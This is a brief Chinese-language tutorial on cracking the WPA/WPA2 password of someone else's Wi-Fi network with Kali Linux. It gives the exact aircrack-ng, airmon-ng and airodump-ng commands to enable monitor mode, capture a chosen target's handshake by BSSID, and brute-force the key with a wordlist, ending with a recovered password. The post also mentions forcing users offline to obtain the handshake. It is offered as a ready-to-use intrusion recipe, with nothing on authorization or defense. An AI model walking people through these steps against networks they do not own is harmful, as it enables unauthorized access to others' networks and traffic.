利用kali linux抓包破解wpa/wpa2加密的WIFI密码？

1、进入系统选择应用程序->无线攻击->aircrack-ng(我的是中文版，可自行设置语言选项),这个软件破解WIFI很基础很简单的软件。

2、ifconfig查看你的网卡信息，wlan0即无线网卡，注意，如果没有发现网卡可能是芯片不能被识别，建议选择网卡芯片为3037或rtl8187l的。

3、看到这个界面后输入airmon-ng start wlan0(启动网卡监听模式)，如下图所示。

4、启动后ifconfig查看一下，如果网卡名变成了wlan0mon了，则表示操作成功。

5、一切准备就绪后接下来便开始我们的重点。输入airodump-ng wlan0mon 回车，发现了什么？是不是周围的WIFI都扫出来了？并且还在不断增加，有很详细的WIFI信息，包括信道、MAC、信号强度等等。若想终止扫描则按ctrl+c停止)，扫描结果如图所示。

6、接下来开始抓包，c代表信道，要将谁作为操作目标则选谁，bssid是目标的mac地址，-w参数指的是将抓到的包要放的目录。输入命令：airodump-ng wlan0mon -c 4 –bssid XX:XX:XX:XX(MAC地址) -w /root wlan0mon，启动抓包后如图所示。

7、对于抓包指的是对方正在使用WIFI并和路由器不断交换数据，要是没有人使用，一直空闲的话是没办法抓到包的，还有就是用户在使用过程中抓不到包就需要对该WIFI进行攻击，让用户被迫掉线后进行握手包的抓取，这里不提供攻击，当初下下图的时候表示抓包成功。

8、接下来用抓来的包进行破解，新开一个窗口，键入aircrack-ng -w 指向字典文件（绝对路径） /root-02.cap (注意：w后跟你字典的地址，root-02cap是握手包，根据你的名称写)，例如我的字典在：/usr/share/wordlists/zd.txt。则应该输入：aircrack-ng -w /usr/share/wordlists/zd.txt /root-02.cap。然后就开始暴力解包了，纯数字的话速度很快的，慢慢喝茶等吧。，过一会儿密码出来了，KEY FOUND:19921011。